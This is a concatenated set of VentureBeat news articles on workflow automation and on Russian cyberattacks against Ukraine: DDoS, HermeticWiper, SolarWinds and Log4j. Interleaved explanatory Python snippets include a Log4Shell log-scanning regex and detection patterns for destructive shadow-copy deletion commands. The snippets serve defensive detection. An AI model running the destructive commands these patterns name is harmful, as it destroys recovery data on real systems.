In November 2019, Microsoft renamed its IFTTT competitor Microsoft Flow as Power Automate to align with its Power Platform, a business tool that lets anyone analyze, act, and automate across their organization. With today’s updates, Microsoft is focusing on RPA features that help companies find the tasks best suited for automation. Power Automate Desktop extends the automation capabilities in Power Automate to on-premises processes and tasks. Now that it’s generally available, anyone in the organization can automate desktop or web-based applications. Power Automate Desktop unifies API-based automation with cloud flows (also known as Digital Process Automation) and UI-based automation with desktop flows (previously called “UI flows”). RPA in Power Automate can do a lot, but it can’t identify workflow bottlenecks that slow your business down. That’s where process advisor comes in. Power Automate’s process advisor Power Automate now shows how processes are being performed, helping you visualize and analyze them for automation. The process advisor can surface insights about time-consuming processes across your organization. Ideally, the processes that demand the most manual time and resources should be automated. Here’s how it works. Process advisor runs process recorders to capture the detailed steps for each process, creates process maps to show an end-to-end visualization of the variations, and provides analytics to improve processes by viewing each current variation. It takes five steps: Create: Identify and create the process about which you want to gain insights. Share: Invite colleagues to collaborate and add new recordings. Record: Record the actions either you or your colleagues take to complete the process at hand. Annotate/Edit: Remove sensitive information, then group your actions into meaningful activities. 
Analyze: Generate a process map you can analyze for insights. Key insights include how many people recorded the task, the average time it takes to complete a task, how many different paths your users took, and so on. New RPA enhancements Power Automate is gaining role-based sharing so companies can share desktop flows, letting multiple users develop automation scripts. Users can then embed these desktop flows in end-to-end processes they are automating. They can also control who can run, edit, and share a desktop flow, letting front-line workers use or contribute as well. Lifecycle management covers end-to-end creation and movement of desktop flows across any tenant environment. You can add desktop flows along with related assets, such as cloud flows, a Power App, or a Power Virtual Agent. These can then be exported and imported in a user’s tenant for development, test, or production. Next, you can now prioritize which desktop flows run on your machines first based on importance. Power Automate offers a new Priority property to the desktop flows connector that lets you set this either statically or based on dynamic content. You can, for example, prioritize a desktop flow based on the importance of the email that triggered it by setting the Importance field as the priority value. Finally, you can see the health and success of your desktop flow runs with real-time monitoring. Power Automate has gained a new Monitor section with two new real-time views. On top of viewing execution history per desktop flow or gateway, the new Desktop flow runs page shows a real-time view of all your desktop automations. Using sorts and filters, you can narrow down the list of runs. There’s also a new Desktop flow queues page available in preview, which is useful when you have several automations that need to run on a machine or cluster at the same time. 
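The priority behavior just described, where each queued flow carries a priority value and an operator can force one to the front, can be modeled with an ordinary priority queue. The sketch below is illustrative only; it is not how Power Automate is implemented, and the flow names are invented.

```python
# Sketch of a priority-ordered desktop-flow queue: lower number = higher
# priority, with a runtime "bump to front" admin override. Illustrative only.

import heapq
import itertools

class FlowQueue:
    def __init__(self):
        self._heap = []
        self._order = itertools.count()  # tie-breaker: FIFO within a priority

    def submit(self, flow, priority):
        heapq.heappush(self._heap, (priority, next(self._order), flow))

    def bump(self, flow):
        """Force a queued flow ahead of everything else (admin override)."""
        self._heap = [entry for entry in self._heap if entry[2] != flow]
        heapq.heapify(self._heap)
        heapq.heappush(self._heap, (float("-inf"), next(self._order), flow))

    def run_next(self):
        return heapq.heappop(self._heap)[2]

q = FlowQueue()
q.submit("invoice-processing", priority=2)
q.submit("urgent-email-triage", priority=1)
q.submit("nightly-report", priority=3)
q.bump("nightly-report")  # operator forces it to the top at runtime
order = [q.run_next() for _ in range(3)]
# order == ["nightly-report", "urgent-email-triage", "invoice-processing"]
```

The heap keeps flows sorted by (priority, arrival order), so equal-priority flows run first-in, first-out, and a bumped flow always pops first.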
You can also change the priority at runtime and, if you have administrator privileges for the gateway, force individual desktop flows to the top of the queue to be executed ahead of other high-priority flows. "
15142
2021
"Automated workflows gained traction during the pandemic | VentureBeat"
"https://venturebeat.com/2021/08/11/automated-workflows-gained-traction-during-the-pandemic"
"Automated workflows gained traction during the pandemic The pandemic has spurred an increase in the use of automation, with a third of enterprises reporting they have employed automated processes in five or more departments during the past year — up from 15% in 2020. That’s according to Workato’s inaugural Work Automation Index, which was released today and drew on nearly 700 mid-sized to large enterprises using Workato’s workflow automation platform. “Enterprise automation experienced a rapid surge in adoption this past year — no surprise, as business leaders closely examined where they could be more efficient in their operations and support remote teams amid a global pandemic,” Workato CIO Carter Busse said in a press release. 
The Work Automation Index, which looked at enterprises with revenue from $50 million to over $2 billion from April 2019 to March 2021, found “pronounced” automation expansion in specific lines of business. For example, customer support automation saw the biggest uptick of any department (over 290% year-over-year), with automation of return and refund processing experiencing 476% growth from the pre-pandemic period. During the pandemic, enterprises turned to automation to scale up their operations while freeing customer service reps to handle challenging workloads. According to Canam Research, 78% of contact centers in the U.S. now intend to deploy AI in the next three years. And research from The Harris Poll indicates that 46% of customer interactions are already automated, with the number expected to reach 59% by 2023. Chatbot usage in particular exploded during the pandemic as organizations looked to bridge gaps in customer service and onboarding. In 2020, the chatbot market was valued at $17.17 billion, and it is projected to reach $102.29 billion by 2026, according to Mordor Intelligence. There was also a 67% increase in chatbot usage between 2018 and 2020. And Gartner predicts that by 2022, 70% of customer interactions will involve emerging technologies such as chatbots — an increase of 15% from 2018. Automation growth Finance automation was another growing priority for enterprises over the past year, Workato found, with the volume of automated processes across the finance sector increasing by 199% — almost threefold. At the same time, data pipeline automation — i.e., automation of pipelines connecting business apps with cloud data warehouses — surged by 152% as companies embraced digital transformation. 
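As a quick sanity check, the chatbot-market figures quoted above imply a compound annual growth rate of roughly 35%:

```python
# Implied CAGR from the Mordor Intelligence figures quoted above:
# $17.17B in 2020 growing to a projected $102.29B in 2026 (6 years).
start, end, years = 17.17, 102.29, 6
cagr = (end / start) ** (1 / years) - 1
print(f"implied CAGR: {cagr:.1%}")  # implied CAGR: 34.6%
```

That is aggressive but not implausible growth given the pandemic-era adoption figures cited in the surrounding research.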
But recruitment saw the highest automation expansion of any single process at 547%, reflecting the digital shift of employee hiring, onboarding, and offboarding. Security and compliance automation grew by 171%, meanwhile, reflecting a broader industry trend. Known as autonomous response, defensive AI-powered security automation can interrupt attacks without affecting day-to-day business. According to a recent Darktrace report, 44% of executives are assessing AI-enabled security systems and 38% are deploying autonomous response technology. In a 2019 analysis, Statista reported that around 80% of executives in the telecommunications industry believe their organization wouldn’t be able to respond to cyberattacks without AI. Overall, the Workato report reinforced the notion that the number of industries automation touches is still growing. A Deloitte report predicts the technology will achieve “near-universal adoption” within five years. And Gartner estimates that by 2024, organizations can lower operational costs 30% by combining automation technologies like robotic process automation (RPA) with redesigned operational processes. “Automation was a key driver in departments we anticipated, like IT and finance, but also provided increased capabilities in areas we didn’t expect, such as recruitment and customer success,” Busse continued. “From boosting employee productivity to creating better customer experiences, automation freed businesses and teams to focus on the priorities that mattered most at an incredibly uncertain time in the market.” "
15143
2022
"Ukraine defense ministry, banks hit by cyberattacks | VentureBeat"
"https://venturebeat.com/2022/02/15/ukraine-defense-ministry-banks-hit-by-cyberattacks"
"Ukraine defense ministry, banks hit by cyberattacks Ukraine’s Ministry of Defense reported Tuesday that it has suffered a cyberattack, while the Ukrainian government also disclosed that cyberattacks struck two banks in the country. The State Service of Special Communication and Information Protection of Ukraine said in a statement posted online that there was a “powerful” distributed denial-of-service (DDoS) attack Tuesday against “a number of information resources of Ukraine.” The affected targets included the websites of the Ministry of Defense and the Armed Forces of Ukraine, as well as the web services of Privatbank and Oschadbank. The full statement: Starting from the afternoon of February 15, 2022, there is a powerful DDOS attack on a number of information resources of Ukraine. In particular, this caused interruptions in the work of web services of Privatbank and Oschadbank. 
The websites of the Ministry of Defense and the Armed Forces of Ukraine were also attacked. As of 19:30, the work of banking web resources has been resumed. A working group of experts from the main subjects of the national cybersecurity system is taking all necessary measures to resist and localize the cyberattack. It was not immediately clear whether Russia, which has amassed an estimated 130,000 troops near Ukraine, was connected to any of the cyberattacks. On the website of ArmyINFORM, the Ministry of Defense of Ukraine’s information agency, a translation of a post today says the ministry experienced a cyberattack that was “probably” a distributed denial-of-service (DDoS) attack. “The official web portal of the Ministry of Defense of Ukraine probably suffered DDoS attacks when an excessive number of requests per second was recorded,” the translation of the post says. Technical work to restore the portal is underway, according to the translation of the post. The Ukrainian Centre for Strategic Communications and Information Security, a wing of the nation’s culture ministry, also confirmed the attack in a statement and said that the attack had shut down access to the defense ministry’s site, according to a Reuters report. The statement did not specify who is being blamed for it, but the Reuters report suggested that the statement could be interpreted as accusing Russia. “It is not ruled out that the aggressor used tactics of little dirty tricks because its aggressive plans are not working out on a large scale,” the centre said in the statement cited by Reuters. Christian Sorensen, former operational planning team lead for the U.S. Cyber Command, told VentureBeat today that these attacks “are ratcheting up attention and pressure.” “It doesn’t sound like much impact yet,” Sorensen said in an email. 
“In the coming hours and days, I would anticipate more activities to isolate and disrupt Ukrainian citizens and especially government activities. The purpose at this stage is to increase leverage in negotiations. Next stage will be impactful and continue deterrence for other countries to get involved.” Russia-affiliated threat actors “have certainly leveraged massive DDoS attacks in the past, as we saw in Estonia in 2007” — in attacks that “crippled the Estonian economy,” said Rick Holland, chief information security officer at Digital Shadows, in an email. “But thus far, the DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks seen in January,” Holland said. “They could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.” Threat actors that aren’t linked with Russia “could be responsible for the DDoS attacks” against Ukrainian targets today, he noted. “However, as with anything attribution-related, evidence to substantiate this would be required.” Background The Russian build-up near Ukraine includes armored vehicles, ships, and aircraft, according to reports. In mid-January, a day after the failure of diplomatic efforts to halt the Russian troop build-up, more than 70 Ukrainian government websites were targeted with the new “WhisperGate” family of malware. Ukraine blamed Russia for the attacks, which left many of the government’s websites inaccessible or defaced. Cybersecurity experts say that if Russia does plan to invade Ukraine, it would undoubtedly use cyberattacks as a key part of its strategy — just as the country has done in previous military campaigns over the past decade-and-a-half, including in Georgia and the Crimean Peninsula in Ukraine. 
“In these previous conflicts, cyber was used to facilitate a Russian occupation that remains today in previously sovereign territory of another country,” said Sorensen, who is now founder and CEO of cybersecurity firm SightGain, in a previous email. “In this way, cyber is tightly integrated into Russian tactics.” If an invasion does occur, “it’s not really a question of whether cyberattacks on Ukraine will take place,” said Mathieu Gorge, author of The Cyber Elephant in the Boardroom and the founder and CEO of cybersecurity firm VigiTrust. “Bringing down critical infrastructure in Ukraine, or any opponent’s sovereign state infrastructure, is a tactic to either precede or augment physical attacks,” Gorge said in a previous email. “The idea behind it is that if you cripple the country physically at their border while crippling access to banking, electricity, health services, and IT systems, your attack is much more powerful.” Russia’s strategy will be to generally spread fear, uncertainty, and doubt — both before and during an active/shooting conflict — and to target military personnel and communications during active conflict, Sorensen said. In prior attacks, cyber was used as a diversion — in order to confuse the targets enough to “not put up a big fight or get organized until it was too late,” Sorensen said. Broader cyber conflict? On Friday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) posted a warning about the potential for attacks against U.S. targets by Russia in connection with the tensions over Ukraine. “While there are not currently any specific credible threats to the U.S. homeland, we are mindful of the potential for the Russian government to consider escalating its destabilizing actions in ways that may impact others outside of Ukraine,” CISA said in its “Shields Up” warning. 
“CISA recommends all organizations — regardless of size — adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets.” Meanwhile, Russian cyberattacks against western targets have reportedly already taken place in connection with the Ukraine tensions. Last month, a Russia-linked hacker group is believed to have launched a cyberattack against a western government organization in Ukraine, according to researchers at Palo Alto Networks’ Unit 42. The attack involved a “targeted phishing attempt” and attempted delivery of malware, Unit 42 reported. The leadership of the group, which Unit 42 has referred to as “Gamaredon,” includes five Russian Federal Security Service officers, the Security Service of Ukraine said previously. Unit 42 did not identify or further describe the western government entity that was targeted by Gamaredon. "
15144
2022
"U.S., U.K. say Russia was behind Ukraine DDoS attacks | VentureBeat"
"https://venturebeat.com/2022/02/18/u-s-u-k-say-russia-was-behind-ukraine-ddos-attacks"
"U.S., U.K. say Russia was behind Ukraine DDoS attacks The administration of U.S. President Joe Biden and a U.K. government agency today attributed this week’s distributed denial-of-service (DDoS) attacks in Ukraine to Russia, as tensions escalated in the region. The DDoS attacks against military and financial institutions in Ukraine on Tuesday were the “largest” in the country’s history, according to the Ukrainian government. The attacks affected targets including the websites of the Ministry of Defense and the Armed Forces of Ukraine, as well as the web services of Privatbank, Oschadbank, and Monobank. On Wednesday, the Security Service of Ukraine (SSU) said preliminary information suggested that in the DDoS attacks, “Russian special services may be involved.” ‘Russia was responsible’ Today, the U.S. 
deputy national security adviser for cyber and emerging technology, Anne Neuberger, said at the White House that intelligence suggests that Russia’s intelligence directorate, known as the GRU, was behind the attacks. “We have assessed that Russia was responsible for the DDoS attacks that occurred earlier this week,” Neuberger said, according to a report in The Hill. Meanwhile, in the U.K., the Foreign, Commonwealth and Development Office reported that based on a technical analysis, the GRU is believed to have been involved in the DDoS attacks against targets in Ukraine this week. “The Government today attributed the distributed denial of service (DDoS) attacks against the Ukrainian banking sector on 15 and 16 February 2022 to have involved the Russian Main Intelligence Directorate (GRU),” the agency said in a post. A spokesperson for the Kremlin denied Russian involvement in the DDoS attacks earlier this week. Cyber warfare tactics? DDoS attacks typically attempt to bring down websites or networks by overwhelming servers with traffic. Concerning this week’s attacks, the main purpose was “to sow panic among Ukrainians and destabilize the situation in the country,” a Ukrainian government agency said in a statement earlier this week. “In fact, it was a large-scale stress test that Ukraine withstood.” The attacks began with “fake texts sent en masse about disruptions in the functioning of banks,” the Centre for Strategic Communication, a non-governmental organization in Ukraine, said in a post. Because of the texts, “Ukrainians rushed to check bank applications or withdraw money at ATMs,” the organization said in the post. “This effectively increased the power of the attack, creating an additional load on the systems. 
Which, in turn, helped the aggressor implement its plans."

Cybersecurity experts say that if Russia does plan to invade Ukraine, it would undoubtedly use cyberattacks as a key part of its strategy — just as the country has done in previous military campaigns over the past decade and a half, including in Georgia and the Crimean Peninsula in Ukraine. In January, Ukraine blamed Russia for attacks that left dozens of the government's websites inaccessible or defaced. Experts have also said that cyberattacks could be carried out against targets in western countries, including the U.S., in connection with the Ukraine situation. On Tuesday, Biden said that "if Russia attacks the United States or allies through asymmetric means, like disruptive cyberattacks against our companies or critical infrastructure, we are prepared to respond."

Tensions escalate

The attribution of this week's Ukraine DDoS attacks to Russia came as tensions around the Ukraine crisis continued to rise on Friday, with the U.S. saying that Russia has now amassed 190,000 troops near the borders of Ukraine — up from 100,000 in late January. On Friday, Russian-backed leaders in eastern Ukraine issued orders for residents to evacuate to Russia, and Ukraine said that Russia has attempted to stage a crisis in eastern Ukraine as grounds for an invasion. "We categorically refute Russian disinformation reports on Ukraine's alleged offensive operations or acts of sabotage in chemical production facilities," said Dmytro Kuleba, minister of foreign affairs of Ukraine, on Twitter.

In remarks Friday at the White House, Biden said he's "convinced" that Russian President Vladimir Putin has made the decision to invade Ukraine, citing U.S. intelligence. "As of this moment, I'm convinced he's made the decision," Biden said.
© 2023 VentureBeat. All rights reserved.
Russia may use SolarWinds-like hacks in cyberwar over Ukraine | VentureBeat
https://venturebeat.com/2022/02/27/russia-may-use-solarwinds-like-hacks-in-cyberwar-over-ukraine
Stiff sanctions against Russia and Vladimir Putin over Ukraine mean a wave of cyberattacks may be headed for the U.S. and other western nations as retaliation, cyber experts say, as part of what could become an escalating "cyberwar." Security teams, of course, are perpetually on guard for Russian attacks — but the threat this time could be especially difficult to see coming, experts told VentureBeat. That's because Russia is believed to have been saving up some of its best options for a moment like this one. Russian threat actors are widely believed to have gained footholds into corporate and government systems — via SolarWinds-like software supply chain breaches, the Log4j vulnerability, or even the SolarWinds hack itself — which just haven't come to light yet. But they might soon.
Cyber experts are warning of an increased risk of cyberattacks from Russia, following sanctions that booted major Russian banks from the SWIFT financial system. The move essentially prevents the Russian banks from carrying out international transactions, and followed other rounds of sanctions over Russia's invasion of Ukraine, including some that have hit Putin himself.

Breaching supply chains

The SWIFT sanctions had previously been described as the "nuclear option," and are exactly the sort of thing that Putin had vowed to retaliate against. And cyberattacks are his preferred method for hitting back against the west. In assessing the size and scope of Russia's military campaign in Ukraine, "this attack has been in the planning for years," said Eric Byres, CTO of cyber firm aDolus Technology. "Efforts to prepare their cyber campaign will have matched the efforts on the ground, so you know that Russia will have cyberattack resources that match their military ones."

Russian threat actors — whether in government agencies such as the GRU and SVR, or in sympathetic groups such as Conti — have almost certainly compromised software supply chains that we don't know about yet, according to cyber experts. And in any cyberwar maneuvers targeting the west, they might opt to utilize this access. "I'm willing to bet that the Russians haven't used even a fraction of the bullets in their cyber arsenal," Byres said in an email.

SolarWinds

Uncovered in December 2020, the attack on SolarWinds and customers of its Orion network monitoring platform has been linked to the Russian intelligence agency SVR. The attackers managed to breach the software supply chain and insert malicious code into the application, which was then distributed as an update to thousands of customers.
As a result, the attackers are believed to have gained access for as much as nine months to numerous companies and government agencies, including FireEye, Microsoft and the Departments of Defense, State and Treasury. Notably, however, SolarWinds was not the first major software supply chain attack attributed to Russia, or even the most damaging. The 2017 NotPetya attack is believed to have originated through a compromise of an accounting application, MeDoc, which was made by a Ukrainian company and widely used in the country. The malware, delivered through updates to the compromised software, ended up spreading worldwide. And it remains the costliest cyberattack to date, with damages of $10 billion. Other high-profile supply chain breaches have included Kaseya and Codecov — and according to data from Aqua Security, software supply chain attacks surged by more than 300% overall in 2021.

Unknown breaches

Russian threat actors have likely carried out many such breaches that remain unknown, for now. "Supply chain penetrations don't show up on satellite photos like tanks do, so we don't really know where the Russian cyber implants are lurking," Byres said. In the wake of Russia's unprovoked attack on Ukraine, the country has most likely been holding off on using its attack capability in the U.S. to see how hard the west would hit back with sanctions and support for Ukraine, Byres said.

Researchers at Cisco Talos have similarly been warning about the heightened risk of Russian attacks originating in the software supply chain in connection with Russia's aggressions in Ukraine. "We assess that these actors would likely abuse elements of complex systems to achieve their objectives on targeted environments," Talos researchers wrote in a blog post.
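As an aside on the update-channel tampering described above: one baseline control is verifying a downloaded installer against a vendor-published digest before installing it. The sketch below is illustrative only (the file paths and digests are hypothetical), and it is worth noting its limits: in the SolarWinds case the trojanized build was legitimately signed by the vendor, and in the MeDoc case the vendor's own update server was compromised, so a hash check alone would not have caught either.

```python
import hashlib

def sha256_of(path, chunk_size=1 << 20):
    """Stream a file through SHA-256 so large installers aren't loaded into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_update(path, expected_digest):
    """Refuse to proceed if the file's hash doesn't match the published value."""
    actual = sha256_of(path)
    if actual != expected_digest.lower():
        raise ValueError(f"checksum mismatch for {path}: got {actual}")
    return True
```

In practice this is combined with code signing, transparency logs, and software bills of materials rather than used alone.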
"Past examples of this include the use of Ukrainian tax software to distribute NotPetya malware in 2017 and, more recently, the abuse of SolarWinds to gain access to high-priority targets." In all likelihood, the Russian threat actors behind the SolarWinds attack still have access from the breach in many companies that has so far gone unused, experts say.

Privileged access

The SolarWinds attack was "unique in that the threat actor targeted and gained persistent, invasive access to select organizations' enterprise networks, their federated identity solutions, and their Active Directory and Microsoft 365 environments," said James Turgal, a 22-year veteran of the FBI and now a vice president at cybersecurity consulting firm Optiv. "The actor used that privileged access to collect and exfiltrate sensitive data and created backdoors to enable their return."

Turgal, whose time at the FBI included serving as executive assistant director for the Information and Technology Branch, said the risk is from the threat actor's "deep penetration into the compromised networks." "Unless each and every server, drive or compromised device was replaced or re-baselined, the probability of complete eviction of the malicious code would be low, due to the high cost and complexity of such a remediation," he said. "Absent complete replacement or re-baseline remediation actions, those victims' enterprise networks and cloud environments will be exposed to substantial risk for repeat and long-term undetected Russian threat actor activity, and those compromised organizations could be re-victimized when the threat actor desires to do so."

Ultimately — with SolarWinds, and even NotPetya — "there may be victims that have been compromised by those attacks, and they just don't know it yet," Turgal said. Byres agreed, saying he's "certain" Russia has access to victims of the SolarWinds campaign that we aren't aware of yet.
"Back in February 2021, I listened to a briefing by a G7 security agency where the director commented that critical infrastructure companies were still reporting to the agency that they had just discovered compromised SolarWinds software in their systems. This was three months after the malware was uncovered," Byres said. "Three months is a lifetime in the cyber world and the Russians would have had more than enough time to hide deep inside a system and cover their tracks."

Today, Reuters reported that U.S. banks are making preparations for potential cyberattacks in retaliation for sanctions on Russia such as SWIFT. The report specifically mentions that for banks, the SolarWinds breach "is top of mind." And SolarWinds is "just one campaign that we know about," Byres said.

Log4j

For instance, the Apache Log4j vulnerability uncovered in December "was a Christmas gift to the Russians," he said. "The vulnerable software is widespread, and the exploit was easy and powerful." Russian agencies almost certainly used the vulnerability, which is believed to have appeared in logging software used by practically every company, to gain footholds into critical systems in the U.S. that they haven't leveraged yet, Byres said. (Researchers have noted that major attacks utilizing Log4j have been lower than expected so far.)

In the current threat situation overall, western companies that have commercial connections to Ukraine are at an especially high risk, according to Byres. For instance, Maersk reported it lost as much as $300 million in the NotPetya attack. While the shipping firm is based in Denmark, it reportedly used the MeDoc accounting software — "which implied they had business dealings with Ukraine, a fact that was unpopular in Moscow," Byres said. And notably, while NotPetya did coincide with a Russia-backed separatist movement in Ukraine, "there wasn't a full-blown war occurring," he said.
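For context on the Log4j flaw mentioned above: exploitation attempts for Log4Shell (CVE-2021-44228) commonly appeared in web and application logs as `${jndi:...}` lookup strings, and a first triage step for many teams was simply scanning logs for that pattern. The sketch below is a rough illustrative heuristic, not a complete detector; real attackers used nested obfuscation (e.g. `${${lower:j}ndi:...}`) that this simple regex will miss.

```python
import re

# Matches plain ${jndi:...} lookup strings over the protocols most often
# seen in Log4Shell exploitation attempts. Illustrative heuristic only.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldaps|ldap|rmi|dns)://[^}]+\}", re.IGNORECASE)

def suspicious_lines(log_lines):
    """Return (line_number, line) pairs containing a JNDI lookup string."""
    return [(i, line) for i, line in enumerate(log_lines, 1)
            if JNDI_PATTERN.search(line)]
```

A scan like this only finds attempts recorded in logs; it says nothing about whether an attempt succeeded.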
"So anyone in the west dealing with Ukrainian businesses today is facing a much bigger risk than Maersk did in 2017."

Fighting fires

That being said, Russia will likely be looking to bring cyberwarfare against companies that don't directly deal with Ukraine as well, Byres said. Putin has made it clear that the entire western world is his enemy and all options are on the table, he said. "Any country and its infrastructure is fair game for a cyberattack" if Putin perceives it is interfering with his goals, Byres said. If the Russians had managed to subdue all of Ukraine in just a few days, they probably would've kept cyber weapons in the U.S. infrastructure under wraps for a rainy day in the future, he noted. But after the sanctions of recent days and stiffer resistance from Ukraine's forces than expected, that calculus may have changed.

For cyber defenders in the west, "our job is to uncover these attacks quickly and put them out before they spread and do serious damage," Byres said. "It is a lot like fighting forest fires – the effective response is to spot little fires quickly and extinguish them before they become big fires." That can only happen when you have visibility of "both the overall forest and the trees within that forest," he said. "Governments and company management need to be able to see the forest and the trees in our software supply chain."
Ukraine border control hit with wiper cyberattack, slowing refugee crossing | VentureBeat
https://venturebeat.com/2022/02/27/ukraine-border-control-hit-with-wiper-cyberattack-slowing-refugee-crossing
(Photo: People walking past cars waiting to cross from Ukraine into Romania on February 25, 2022.)

A Ukraine border control station has been struck with a data wiper cyberattack that has slowed the process of allowing refugees to cross into Romania, a cybersecurity expert who spoke with Ukrainian agents at the border crossing told VentureBeat. Refugees fleeing Ukraine after Russia's invasion of the country have faced long waits at the border, sometimes for as long as days. At least part of the reason appears to be the impact of another major wiper attack, according to the cybersecurity expert, Chris Kubecka, who spoke with VentureBeat on Sunday.
"People are stuck because Ukraine cannot process anything except on pencil and paper," said Kubecka, who was able to cross into Romania on Saturday on a bus with about two dozen people fleeing Ukraine. The wiper attack at a Ukraine border control station was first reported by the Washington Post.

Kubecka said she believes the wiper attack occurred early on Saturday morning, shortly after 6 a.m. Ukraine time. She says she inquired into the reason for the long delays and found out that a cyberattack had occurred. Given her background in cybersecurity, she was able to speak with Ukrainian agents at the border station about what had happened. They told her that it "seems to be the same exact wiper virus that had hit some of the ministries," Kubecka said.

Last Wednesday, data-wiping malware was deployed against the Ukrainian defense ministry as well as financial, aviation and IT services companies in Ukraine just ahead of Russia's invasion of the country. The wiper has been referred to as "HermeticWiper" by researchers. The wiper attack that hit the border crossing on Saturday affected the Ukraine-Romania border crossing at Siret, said Kubecka, who documented her journey in a series of tweets. The destructive cyberattack appears to have only impacted the Ukrainian border control, and not the Romanian station, she said. It was not clear if the border crossing has been able to get its computer systems back online. VentureBeat has reached out to the State Border Guard Service of Ukraine and the Security Service of Ukraine.

More than 368,000 people have fled Ukraine since Russia's unprovoked invasion of the country last Thursday, according to the United Nations. Ukraine has needed to closely verify those leaving the country because of the requirement that males ages 18 to 60 remain in Ukraine.
However, at least at the Siret border crossing, that was proving to be a major challenge on Saturday, Kubecka said. "'We got hit with the wiper virus, we can't process anything,'" she was told by the authorities at the crossing.

Kubecka said she is trying to obtain a sample of the wiper malware to give it to parties such as the European Union and CERT-EU (the Computer Emergency Response Team for the EU). "I'm still waiting for arrangements to be made to hand carry it from the border, if I can," she said. Kubecka, a U.S. native and Air Force veteran now residing in the Netherlands, was in Ukraine because of her background and expertise in the area of cyberwarfare. Her resume has included helping to restore systems for Saudi Aramco after a massive cyberattack in 2012, and she is now the founder and CEO of cyber consulting firm HypaSec.

Kubecka says she spent about 28 hours waiting to cross into Romania before being allowed through. "We slept in the bus," she said. While some in academia may be saying that "cyberwar has not happened yet — it's only a cyber crisis," Kubecka said, "that's BS. It's happening right now. They're halting and slowing down the evacuation of so many people."
Ransomware used as a 'decoy or distraction' in Ukraine attacks, researchers say | VentureBeat
https://venturebeat.com/2022/02/24/ransomware-used-as-a-decoy-or-distraction-in-ukraine-attacks-researchers-say
Cyberattackers deployed ransomware in several instances to serve as a "decoy or distraction" as they targeted organizations in Ukraine with disk-wiping malware on Wednesday, just before Russia's invasion of the country, researchers at Symantec said. The data wiper has been dubbed HermeticWiper by a researcher at SentinelOne, since its digital certificate had been issued under the name Hermetica Digital Ltd. Researchers at Symantec and ESET first disclosed details on the data wiper on Wednesday. ESET reported that the wiper was installed on hundreds of machines in Ukraine, and followed distributed denial-of-service (DDoS) attacks targeting Ukrainian websites earlier in the day. Symantec's researchers reported they've also discovered evidence that the wiper attacks affected machines in Lithuania and Latvia.
Decoy for destructive malware

In the attacks Wednesday, Symantec researchers said that the destructive malware was deployed against defense organizations as well as financial, aviation and IT services companies. And ransomware was a component of the attacks in some cases. "In several attacks Symantec has investigated to date, ransomware was also deployed against affected organizations at the same time as the wiper," Symantec researchers said in a blog post. "As with the wiper, scheduled tasks were used to deploy the ransomware," the researchers said. "File names used by the ransomware included client.exe, cdir.exe, cname.exe, connh.exe, and intpub.exe."

Notably, "it appears likely that the ransomware was used as a decoy or distraction from the wiper attacks," the Symantec researchers said, posting an image of a presumably fake ransom note used with the ransomware. This approach "has some similarities to the earlier WhisperGate wiper attacks against Ukraine, where the wiper was disguised as ransomware," the researchers said, referring to the January attacks that left dozens of the Ukrainian government's websites inaccessible or defaced.

Cyber escalation

As for HermeticWiper, Juan Andres Guerrero-Saade, the researcher at SentinelOne who gave the malware its name, reported that the wiper erases Windows devices by deleting shadow copies and manipulating the Master Boot Record (MBR), leaving the machine unable to boot after a reboot. "After a week of defacements and increasing DDoS attacks, the proliferation of sabotage operations through wiper malware is an expected and regrettable escalation," Guerrero-Saade wrote.

Ultimately, the risk has only intensified that the cyberattacks "could extend out of Ukraine, and impact NATO and EU member states," researchers at the Digital Shadows Photon Research team said Thursday.
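The shadow-copy deletion behavior described above is a common tell for wipers and ransomware generally, and endpoint tools often flag the Windows command lines used to destroy Volume Shadow Copies. As a toy illustration only, a command-line heuristic might look like the following; the patterns are generic examples of this class of detection, not any vendor's actual rules and not specific to HermeticWiper.

```python
import re

# Command lines commonly associated with destroying Windows Volume Shadow
# Copies or disabling recovery before a wipe/encryption. Illustrative only.
DESTRUCTIVE_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
    re.compile(r"bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.IGNORECASE),
]

def flag_process(cmdline):
    """Return True if a process command line matches a known-destructive pattern."""
    return any(p.search(cmdline) for p in DESTRUCTIVE_PATTERNS)
```

Real detections correlate such command lines with parent processes and raw-disk writes, since legitimate administration can occasionally trigger similar commands.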
"This has already been observed with HermeticWiper impacting networks in Latvia and Lithuania." The 2017 NotPetya attack "immediately springs to mind," the Digital Shadows researchers said. Ordered by the Russian government and initially targeted at companies in Ukraine, the NotPetya worm ended up spreading worldwide. It remains the costliest cyberattack to date, with damages of $10 billion. Additionally, Russia-based cybercriminals "may also be emboldened or otherwise encouraged by Russia's actions," the Digital Shadows researchers said.
Cyber threat grows after Russia SWIFT sanctions over Ukraine | VentureBeat
https://venturebeat.com/2022/02/26/cyber-threat-grows-after-russia-swift-sanctions-over-ukraine
(Photo: Ukraine is getting international support.)

Cyber experts warned of increased risk of cyberattacks from Russia, following the latest sanctions announced over Ukraine — which dropped major Russian banks from the SWIFT financial system. Russian President Vladimir Putin has threatened retaliation against the west for what he perceives as interference in the country's unprovoked assault on its neighbor Ukraine. And as is well known, both the Russian government itself and affiliated cybercriminal gangs possess significant cyberattack capabilities — and Russia has a history of using them in geopolitical contexts. Authorities in the U.S. and U.K. blamed Russia for last week's massive distributed denial-of-service (DDoS) attacks in Ukraine.
And fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. But thus far, "I'm willing to bet that the Russians haven't used even a fraction of the bullets in their cyber arsenal," said Eric Byres, CTO of cyber firm aDolus Technology, in an email.

Punishing Putin

